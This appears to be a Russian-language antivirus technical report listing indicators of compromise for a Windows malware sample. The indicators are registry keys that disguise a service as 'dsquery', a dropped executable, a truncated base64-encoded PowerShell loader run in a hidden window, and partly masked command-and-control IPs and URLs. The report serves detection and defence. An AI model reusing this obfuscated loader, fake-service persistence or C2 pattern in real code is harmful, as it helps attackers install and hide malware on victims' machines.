Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\dsquery] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dsquery] 'ImagePath' = '"<SYSTEM32>\tzutil\dsquery.exe"'
- 'dsquery' "<SYSTEM32>\tzutil\dsquery.exe"
- 'dsquery' <SYSTEM32>\tzutil\dsquery.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAGMAMwB1AHoAagBoAD0AKAAnAFkAcAAnACsAJwBqACcAKwAoACcAMQBpACcAKwAnAHYAcwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABlAE0AcABcAHcATwByAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\wdq4vyp.exe
- <SYSTEM32>\tzutil\dsquery.exe
- %TEMP%\word\2019\wdq4vyp.exe в <SYSTEM32>\tzutil\dsquery.exe
- '21#.#0.40.16':80
- '91.##1.54.71':8080
- http://le###2wow.com/wp-content/OC/
- http://91.###.54.71:8080/qPym9njrd38qD/FKUhHCct4kEQP7/ via 91.##1.54.71
- DNS ASK le###2wow.com
- '%TEMP%\word\2019\wdq4vyp.exe'
- '<SYSTEM32>\tzutil\dsquery.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAGMAMwB1AHoAagBoAD0AKAAnAFkAcAAnACsAJwBqACcAKwAoACcAMQBpACcAKwAnAHYAcwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABlAE0AcABcAHcATwByAGQAXAAyADAAMQA5AF...' (со скрытым окном)